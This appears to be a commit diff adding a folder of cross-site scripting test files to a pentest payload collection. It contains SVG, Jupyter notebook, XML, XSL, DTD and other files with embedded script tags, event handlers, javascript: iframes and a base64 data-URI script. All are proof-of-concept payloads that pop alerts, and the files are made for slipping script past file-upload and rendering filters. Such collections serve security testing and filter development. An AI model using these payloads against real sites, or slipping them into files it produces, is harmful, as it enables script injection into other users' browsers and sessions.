Deployed 3ca2ece with MkDocs version: 1.6.1

XSS Injection/Files/JupyterNotebookXSS.ipynb

@@ -0,0 +1,32 @@
+{
+ "cells": [
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "[XSS](data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5kb21haW4pPC9zY3JpcHQ+Cg==)\n"
+   ]
+  }
+ ],
+ "metadata": {
+  "kernelspec": {
+   "display_name": "Python 3",
+   "language": "python",
+   "name": "python3"
+  },
+  "language_info": {
+   "codemirror_mode": {
+    "name": "ipython",
+    "version": 3
+   },
+   "file_extension": ".py",
+   "mimetype": "text/x-python",
+   "name": "python",
+   "nbconvert_exporter": "python",
+   "pygments_lexer": "ipython3",
+   "version": "3.6.2"
+  }
+ },
+ "nbformat": 4,
+ "nbformat_minor": 2
+}

XSS Injection/Files/SVG_XSS1.svg

@@ -0,0 +1 @@
+<svg><desc><![CDATA[</desc><script>alert(1)</script>]]></svg>

XSS Injection/Files/SVG_XSS2.svg

@@ -0,0 +1 @@
+<svg><foreignObject><![CDATA[</foreignObject><script>alert(2)</script>]]></svg>

XSS Injection/Files/SVG_XSS3.svg

@@ -0,0 +1 @@
+<svg><title><![CDATA[</title><script>alert(3)</script>]]></svg>

XSS Injection/Files/SVG_XSS_green_triangle.svg

@@ -0,0 +1,9 @@
+<?xml version="1.0" standalone="no"?>
+<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
+
+<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
+   <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
+   <script type="text/javascript">
+      alert(document.domain);
+   </script>
+</svg>

XSS Injection/Files/SVG_XSS_nested_img_xlink.svg

@@ -0,0 +1,3 @@
+<svg width="200" height="200" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
+  <image xlink:href="http://127.0.0.1:9999/red_lightning_xss_full.svg" height="200" width="200"/>
+</svg>

XSS Injection/Files/SVG_XSS_nested_svg.svg

@@ -0,0 +1,10 @@
+<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
+  <svg x="10">
+    <rect x="10" y="10" height="100" width="100" style="fill: #002654"/>
+    <script type="text/javascript">alert('sub-svg 1');</script>
+  </svg>
+  <svg x="200">
+    <rect x="10" y="10" height="100" width="100" style="fill: #ED2939"/>
+    <script type="text/javascript">alert('sub-svg 2');</script>
+  </svg>
+</svg>

XSS Injection/Files/SVG_XSS_nested_use_xlink.svg

@@ -0,0 +1,3 @@
+<svg width="200" height="200" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
+  <use xlink:href="http://127.0.0.1:9999/red_lightning_xss_full.svg#lightning"/>
+</svg>

XSS Injection/Files/SVG_XSS_red_lightning.svg

@@ -0,0 +1,15 @@
+<?xml version="1.0" standalone="no"?>
+<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
+<svg version="1.1" baseProfile="full" width="100" height="100" xmlns="http://www.w3.org/2000/svg" onload="alert('svg attribut')">
+  <polygon id="lightning" points="0,100 50,25 50,75 100,0" fill="#ff1919" stroke="#ff0000"/>
+  <desc><script>alert('svg desc')</script></desc>
+  <foreignObject><script>alert('svg foreignObject')</script></foreignObject>
+  <foreignObject width="500" height="500">
+    <iframe xmlns="http://www.w3.org/1999/xhtml" src="javascript:alert('svg foreignObject iframe');" width="400" height="250"/>
+  </foreignObject>
+  <title><script>alert('svg title')</script></title>
+  <animatetransform onbegin="alert('svg animatetransform onbegin')"></animatetransform>
+  <script type="text/javascript">
+    alert('svg script');
+  </script>
+</svg>

XSS Injection/Files/xml.xsd

@@ -0,0 +1 @@
+<a:script xmlns:a="http://www.w3.org/1999/xhtml">alert(1)</a:script>

XSS Injection/Files/xss.cer

@@ -0,0 +1 @@
+<script>alert(1)</script>

XSS Injection/Files/xss.dtd

@@ -0,0 +1 @@
+<a:script xmlns:a="http://www.w3.org/1999/xhtml">alert(1)</a:script>

XSS Injection/Files/xss.htm

@@ -0,0 +1 @@
+<script>alert(1)</script>

XSS Injection/Files/xss.html.demo

@@ -0,0 +1 @@
+<a:script xmlns:a="http://www.w3.org/1999/xhtml">alert(1)</a:script>

XSS Injection/Files/xss.hxt

@@ -0,0 +1 @@
+<script>alert(1)</script>

XSS Injection/Files/xss.mno

@@ -0,0 +1 @@
+<a:script xmlns:a="http://www.w3.org/1999/xhtml">alert(1337)</a:script>

XSS Injection/Files/xss.rdf

@@ -0,0 +1 @@
+<a:script xmlns:a="http://www.w3.org/1999/xhtml">alert(1)</a:script>

XSS Injection/Files/xss.svgz

@@ -0,0 +1 @@
+<a:script xmlns:a="http://www.w3.org/1999/xhtml">alert(1)</a:script>

XSS Injection/Files/xss.url.url

@@ -0,0 +1,3 @@
+<html>
+    <script>alert(document.domain)</script>
+</html>

XSS Injection/Files/xss.vml

@@ -0,0 +1 @@
+<a:script xmlns:a="http://www.w3.org/1999/xhtml">alert(1)</a:script>

XSS Injection/Files/xss.wsdl

@@ -0,0 +1 @@
+<a:script xmlns:a="http://www.w3.org/1999/xhtml">alert(1)</a:script>

XSS Injection/Files/xss.xht

@@ -0,0 +1 @@
+<a:script xmlns:a="http://www.w3.org/1999/xhtml">alert(1)</a:script>

XSS Injection/Files/xss.xhtml

@@ -0,0 +1 @@
+<a:script xmlns:a="http://www.w3.org/1999/xhtml">alert(1)</a:script>

XSS Injection/Files/xss.xml

@@ -0,0 +1,18 @@
+<html>
+	<head></head>
+	<body>
+		<something:script xmlns:something="http://www.w3.org/1999/xhtml">alert(1)</something:script>
+		<a:script xmlns:a="http://www.w3.org/1999/xhtml">alert(2)</a:script>
+		<info>
+		  <name>
+		    <value><![CDATA[<script>confirm(document.domain)</script>]]></value>
+		  </name>
+		    <description>
+		      <value>Hello</value>
+		    </description>
+		    <url>
+		      <value>http://google.com</value>
+		    </url>
+		</info>
+	</body>
+</html>

XSS Injection/Files/xss.xsd

@@ -0,0 +1 @@
+<a:script xmlns:a="http://www.w3.org/1999/xhtml">alert(1)</a:script>

XSS Injection/Files/xss.xsf

@@ -0,0 +1 @@
+<a:script xmlns:a="http://www.w3.org/1999/xhtml">alert(1)</a:script>

XSS Injection/Files/xss.xsl

@@ -0,0 +1 @@
+<a:script xmlns:a="http://www.w3.org/1999/xhtml">alert(1)</a:script>

XSS Injection/Files/xss.xslt

@@ -0,0 +1 @@
+<a:script xmlns:a="http://www.w3.org/1999/xhtml">alert(1)</a:script>